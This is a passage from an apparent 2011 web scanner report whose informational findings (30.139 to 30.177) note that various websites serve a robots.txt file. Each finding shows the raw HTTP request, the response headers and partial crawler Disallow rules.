Expires: Sun, 15 May 2011 23:51:13 GMT
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
30.139. http://www.developer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.developer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.developer.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 10 Feb 2011 21:34:37 GMT
ETag: "aa-49bf459289540"
Content-Type: text/plain; charset=UTF-8
Cache-Control: public, max-age=722
Date: Sun, 01 May 2011 23:16:20 GMT
Content-Length: 170
Connection: close

User-agent: *
Disallow: /images0/
Disallow: /icom_includes/
Disallow: /img/
Disallow: /javascript/
Disallow: /javascripts/
Disallow: /stylesheets/

Sitemap: /sitemap.xml
30.140. http://www.dezeen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dezeen.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dezeen.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:10 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 25 Apr 2011 20:54:32 GMT
Accept-Ranges: bytes
Content-Length: 370
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /wp-content/themes
Disallow: /trackback
Disallow: /feed

...[SNIP]...
30.141. http://www.diabetesdaily.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diabetesdaily.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.diabetesdaily.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:57 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a DAV/2 mod_bwlimited/1.4 mod_fcgid/2.3.5 SVN/1.6.9 Phusion_Passenger/2.2.11
Last-Modified: Sun, 01 May 2011 20:51:32 GMT
ETag: "dc270-892-4a23d12629d00"
Accept-Ranges: bytes
Content-Length: 2194
Cache-Control: max-age=0
Expires: Sun, 01 May 2011 23:29:57 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_logs/
Disallow: /_marketing/
Disallow: /_notes/
Disallow: /_vbulletin/
Disallow: /ads/
Disallow: /content/printable/
Disallow: /css/
Disallow: /forum/admin/
Disallow: /forum/
...[SNIP]...
30.142. http://www.diabetesjournals.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diabetesjournals.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.diabetesjournals.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:47 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_jk/1.2.28 mod_ssl/2.2.14 OpenSSL/0.9.7a
Last-Modified: Wed, 13 Apr 2011 18:47:26 GMT
ETag: "307c4c4-dbb-4a0d13d6ceb80"
Accept-Ranges: bytes
Content-Length: 3515
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain


#
# ##################################################################
# ##
# ## THIS IS A GENERATED FILE.
# ##
# ## ANY CHANGES YOU MAKE DIRECTLY TO THIS FILE WILL BE OVERWRITTEN
# #
...[SNIP]...
30.143. http://www.docufide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.docufide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.docufide.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:30:40 GMT
Server: docufide webserver
Set-Cookie: JSESSIONID=BFA3DE7A6A69D0BB63D37B970E8CB097; Path=/
Accept-Ranges: bytes
ETag: W/"57-1302855700000"
Last-Modified: Fri, 15 Apr 2011 08:21:40 GMT
Content-Length: 57
LB-node: This page took D=460 microseconds on prodweb1
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: LB-cookie-20480-prodweblb tomcat=AKODKIMAFAAA; Expires=Mon, 02-May-2011 03:29:59 GMT; Path=/

User-agent: *
Disallow: /documents/NCAA+TRS_06032010.pptx
30.144. http://www.dotmed.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dotmed.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dotmed.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:11:17 GMT
Server: Apache
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /redirect.html
Disallow: /users/my/
Disallow: /listings/details.html
Disallow: /listings/detail.html
Disallow: /auctions/index.html
User-agent: BLP_bbot
Crawl-delay: 10
User-ag
...[SNIP]...
30.145. http://www.dotnetspark.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dotnetspark.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dotnetspark.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Sat, 30 Apr 2011 15:52:23 GMT
Accept-Ranges: bytes
ETag: "c0bd5c984e7cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:23:32 GMT
Connection: close
Content-Length: 356

User-agent: *
Sitemap: http://www.dotnetspark.com/sitemap.xml

Disallow: /bin/
Disallow: /App_Data/
Disallow: /*.axd
Disallow: /*.swf
Disallow: /DotNetForum/*.aspx
Disallow: /DotNetResource/*.
...[SNIP]...
30.146. http://www.downloadroute.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.downloadroute.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.downloadroute.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:08:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 09 May 2009 07:29:08 GMT
ETag: "452001e-48-46975b35ab900"
Accept-Ranges: bytes
Content-Length: 72
Cache-Control: max-age=3600
Expires: Mon, 02 May 2011 00:08:09 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

Sitemap: http://www.downloadroute.com/sms.xml

User-agent: *
Disallow:
30.147. http://www.downv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.downv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.downv.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:50:17 GMT
Server: Microsoft-IIS/6.5
Vary: *
Cache-Control: max-age=180
Expires: Mon, 02 May 2011 00:53:17 GMT
Last-Modified: Wed, 02 Sep 2009 08:04:32 GMT
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
30.148. http://www.drivewire.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drivewire.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.drivewire.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:10:42 GMT
Server: Apache
Last-Modified: Tue, 08 Mar 2011 04:38:55 GMT
ETag: "1071c80-2fc-49df1309b35c0"
Accept-Ranges: bytes
Content-Length: 764
Keep-Alive: timeout=7, max=83
Connection: close
Content-Type: text/plain; charset=UTF-8

# C) Copy and Copyright 2007 DriveWire Inc. All Rights Reserved. http://www.drivewire.com/robots.txt
# DriveWire Inc. Does not allow unauthorized spiders and robots.
# Any unauthorized bot running
...[SNIP]...
30.149. http://www.droiddog.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.droiddog.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.droiddog.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:22:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.droiddog.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Set-Cookie: bb2_screener_=1304292121+173.193.214.243; path=/
Set-Cookie: PHPSESSID=f580e400cad935a20e0b52f4e1b3475b; path=/
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8


# XML Sitemap Feed 3.9.1 (http://4visions.nl/en/wordpress-plugins/xml-sitemap-feed/)
Sitemap: http://www.droiddog.com/sitemap.xml
Sitemap: http://www.droiddog.com/sitemap-news.xml

User-agent: *
Disa
...[SNIP]...
30.150. http://www.drudge.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.drudge.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.drudge.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:21 GMT
Server: Apache/2.2.17 (Unix)
Last-Modified: Fri, 27 Jun 2008 17:32:41 GMT
ETag: "c302ff-7a-450a94bf6c040"
Accept-Ranges: bytes
Content-Length: 122
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

User-agent: Mediapartners-Google*
Disallow:

User-agent: discobot
Disallow: /

Sitemap: /sitemap
30.151. http://www.earlham.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.earlham.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.earlham.edu

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:32 GMT
Server: Apache
Last-Modified: Wed, 10 Dec 2008 20:12:19 GMT
ETag: "fc0270-636-45db6e083aec0"
Accept-Ranges: bytes
Content-Length: 1590
Cache-Control: max-age=1209600
Expires: Mon, 16 May 2011 00:14:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...
30.152. http://www.ec51.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ec51.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ec51.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.61
Date: Sun, 01 May 2011 21:23:36 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 1522
Last-Modified: Sat, 30 Apr 2011 23:29:11 GMT
Vary: Accept-Encoding
Accept-Ranges: bytes
Age: 8317
X-Cache: HIT from 127.0.0.1
X-Cache-Lookup: HIT from 127.0.0.1:80
Via: 1.0 127.0.0.1 (squid/3.1.11)
Connection: close

#
# robots.txt for www.ec51.com!
#

User-agent: *
Disallow: /ucp/
Disallow: /acp/
Disallow: /keylist-
Disallow: /keyletter-
Disallow: /google.htm
Disallow: /country-2-LB.html
Disallow: /country-0-GU.h
...[SNIP]...
30.153. http://www.edeals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.edeals.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.edeals.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:39 GMT
Server: Apache/2.2.16 (Amazon)
Last-Modified: Tue, 30 Nov 2010 16:16:31 GMT
ETag: "54f96-e09-4964782f855c0"
Accept-Ranges: bytes
Content-Length: 3593
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /cadmin/
Disallow: /search/
Disallow: /auctions/
Disallow: /redeem/
Disallow: /mredeem/
Disallow: /credeem/
Disallow: /nredeem/
Disallow: /predeem/
Disallow: /psredeem
...[SNIP]...
30.154. http://www.eders.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.eders.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.eders.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:19:52 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 11 Aug 2009 21:08:11 GMT
ETag: "14294cec-e5d-470e41996a4c0"
Accept-Ranges: bytes
Content-Length: 3677
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: Googlebot
Disallow: /*printable=Y*
Disallow: /*js=*
Disallow: /*print_cat=*

User-agent: *
Disallow: /catalog/
Disallow: /cart.php
Disallow: /config.local.php
Disallow: /config.php
Disallo
...[SNIP]...
30.155. http://www.ehobbies.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ehobbies.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ehobbies.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:11:16 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Cache-Control: max-age=3600, private
Expires: Mon, 02 May 2011 01:11:16 GMT
Last-Modified: Tue, 19 Apr 2011 09:47:52 GMT
Accept-Ranges: bytes
Content-Length: 344
Content-Type: text/plain
RTSS: 1
Connection: close

User-agent: *
# Cap is html
Disallow: /cgi-bin/
Disallow: /RT/
Disallow: /TG/
Disallow: /QS/
Disallow: /wgl/
Disallow: /P/
Disallow: /ymix/
Disallow: /OS/
Disallow: /cs/
Disallow: /en=
Disallow: /p/s=
...[SNIP]...
30.156. http://www.elanaspantry.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.elanaspantry.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.elanaspantry.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:29:44 GMT
Server: Apache
Vary: Cookie
X-Pingback: http://www.elanaspantry.com/blog/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.elanaspantry.com/sitemap.xml.gz
30.157. http://www.encomer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.encomer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.encomer.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Sun, 01 May 2011 23:42:13 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-bfgandki=2906D148EC18ABFB180C5BE3152B68B5; path=/
Last-Modified: Tue, 10 Aug 2010 06:57:46 GMT
Content-Length: 51

User-agent: *
Disallow: /cgi-bin/
Disallow: /deep/
30.158. http://www.ephotozine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ephotozine.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ephotozine.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:51:05 GMT
Server: Apache
Last-Modified: Tue, 12 Apr 2011 10:52:40 GMT
Accept-Ranges: bytes
Content-Length: 232
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 00:51:05 GMT
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /s_img/
Disallow: /ajax/
Disallow: /libs/ajax/
Disallow: /libs/javascript/
Disallow: /libs/php/
Disallow: /styles/
Disallow: /dev/
Disallow: /act_clickthrough.cfm*
Disallow: /c
...[SNIP]...
30.159. http://www.etimspayments.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.etimspayments.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.etimspayments.com

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/4.1
Date: Sun, 01 May 2011 23:42:04 GMT
Content-type: text/plain
Last-modified: Wed, 15 Aug 2007 19:01:58 GMT
Content-length: 26
Accept-ranges: bytes
Connection: close

User-agent: *
Disallow: /
30.160. http://www.excellence-resorts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.excellence-resorts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.excellence-resorts.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:38:02 GMT
Server: Apache
Last-Modified: Wed, 12 Jan 2011 15:03:46 GMT
ETag: "67811a1-2c-499a781f8d880"
Accept-Ranges: bytes
Content-Length: 44
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /html
Allow: /

30.161. http://www.expatforum.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expatforum.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.expatforum.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:52:53 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Wed, 29 Sep 2010 13:04:11 GMT
ETag: "128c703-1f4-4916598f8a8c0"
Accept-Ranges: bytes
Content-Length: 500
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /expats/calendar.php
Disallow: /expats/private.php
Disallow: /expats/newreply.php
Disallow: /expats/misc.php
Disallow: /expats/members/
Disallow: /expats/newthread.php
Disallo
...[SNIP]...
30.162. http://www.express.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.express.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.express.co.uk

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:30:45 GMT
Server: Apache
Last-Modified: Wed, 22 Dec 2010 13:50:03 GMT
ETag: "6429b-44-4980007ac58c0"
Accept-Ranges: bytes
Content-Length: 68
MS-Author-Via: DAV
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /comments/view/285302
Disallow: /myexpress/
30.163. http://www.ezboard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezboard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ezboard.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:42:01 GMT
Server: Apache/2.2.8 (EL)
Last-Modified: Wed, 11 Oct 2006 12:41:30 GMT
ETag: "272338-f7-41f885fcb1280"
Accept-Ranges: bytes
Content-Length: 247
Cache-Control: max-age=7776000
Expires: Sat, 30 Jul 2011 23:42:01 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
X-Cache: MISS from static3.yuku.com
X-Cache-Lookup: MISS from static3.yuku.com:80
Via: 1.0 static3.yuku.com:80 (squid/2.6.STABLE6)
Connection: close

User-Agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /editor/
Disallow: /includes/
Disallow: /language/
Disallow: /mambots/
Disallow: /media/
Disallow: /modules/

...[SNIP]...
30.164. http://www.ezisp.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezisp.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ezisp.info

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:58 GMT
Server: Apache
Last-Modified: Thu, 12 Jan 2006 08:20:22 GMT
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /stat.html
30.165. http://www.ezjoblistings.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezjoblistings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ezjoblistings.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:30:43 GMT
Server: Apache
Last-Modified: Fri, 30 Jul 2010 18:41:52 GMT
ETag: "38a5cc8-19-48c9f345063d8"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /
30.166. http://www.ezwebsitecounter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ezwebsitecounter.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ezwebsitecounter.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:44:25 GMT
Server: Apache
Last-Modified: Sun, 10 Apr 2011 07:07:29 GMT
ETag: "d48536-26-4da15731"
Accept-Ranges: bytes
Content-Length: 38
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /c.js
Allow: /
30.167. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.54.21.36
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...
30.168. http://www.facepinch.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facepinch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facepinch.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:18 GMT
Server: Apache/2.2.17 (Unix)
Last-Modified: Sat, 25 Sep 2010 22:05:28 GMT
ETag: "6200f4-19-4911cb162da00"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow:
30.169. http://www.faithclipart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.faithclipart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.faithclipart.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:06:05 GMT
Server: Apache
Last-Modified: Wed, 14 Mar 2007 23:04:56 GMT
ETag: "9c13b2-2b-42bab08ed1600"
Accept-Ranges: bytes
Content-Length: 43
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
30.170. http://www.famegame.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.famegame.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.famegame.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 06 Jan 2010 15:26:45 GMT
ETag: "1800009d-402-47c80950a9740"
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Content-Length: 1026
Date: Mon, 02 May 2011 00:50:13 GMT
X-Varnish: 693068348
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

User-agent: *
Disallow: /mediaObjectEdit/
Disallow: /mediaObjectInfoSave/
Disallow: /mediaObjectInfoSaveEP/
Disallow: /mediaObjectConSave/
Disallow: /mediaUpload/
Disallow: /mediaUploadEP/
Disallow: /
...[SNIP]...
30.171. http://www.fashionbombdaily.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fashionbombdaily.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fashionbombdaily.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:26:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Vary: Cookie
X-Pingback: http://fashionbombdaily.com/xmlrpc.php
X-Mobilized-By: WordPress Mobile Pack 1.2.4
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:
30.172. http://www.febreze.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.febreze.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.febreze.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:54 GMT
Server: Apache
Last-Modified: Fri, 04 Dec 2009 07:27:57 GMT
ETag: "78f56-9f-479e20bf4b940"
Accept-Ranges: bytes
Content-Length: 159
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

#Allow entire Febreze site

User-agent: *
Disallow:/*/swfs/
Disallow:/*/images/
Disallow:/*ipdetection.do

#Disallow all session urls
Disallow:/*/*;jsessionid
30.173. http://www.fedstats.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fedstats.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fedstats.gov

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:14:07 GMT
Server: Apache
Last-Modified: Fri, 20 Apr 2007 19:16:49 GMT
ETag: "1720096-22-42e90293eea40"
Accept-Ranges: bytes
Content-Length: 34
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
30.174. http://www.feedagg.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.feedagg.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.feedagg.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:29:17 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.2.16
Last-Modified: Sun, 01 May 2011 00:08:31 GMT
ETag: "9ac8065-96-4a22bb502ddc0"
Accept-Ranges: bytes
Content-Length: 150
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: 008
Disallow: /    

User-agent: *
Disallow: /add_lens.php
Disallow: /results?
Disallow: /search?cx=
Disallow: /login.php
Disallow: /jail.php
30.175. http://www.fenomen-games.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fenomen-games.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fenomen-games.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 02 May 2011 00:25:35 GMT
Content-Type: text/plain
Content-Length: 305
Last-Modified: Thu, 20 Mar 2008 10:08:45 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Sitemap: http://www.fenomen-games.com/sitemap.xml
Disallow: /favicon.ico
Disallow: /cgi-bin/
Disallow: /style2.css
Disallow: /style.css
Disallow: /files/
Disallow: /dfiles/
Disallow: /do
...[SNIP]...
30.176. http://www.fibromyalgia-symptoms.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fibromyalgia-symptoms.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fibromyalgia-symptoms.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:53:38 GMT
Server: Apache/1.3.39 (Unix)
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /nts/
30.177. http://www.final4ever.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.final4ever.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.final4ever.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:18:09 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 10 Jan 2011 18:25:15 GMT
ETag: "2c7f98-9c4-4998216d998c0"
Accept-Ranges: bytes
Content-Length: 2500
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /member.php
Disallow: /ajax.php
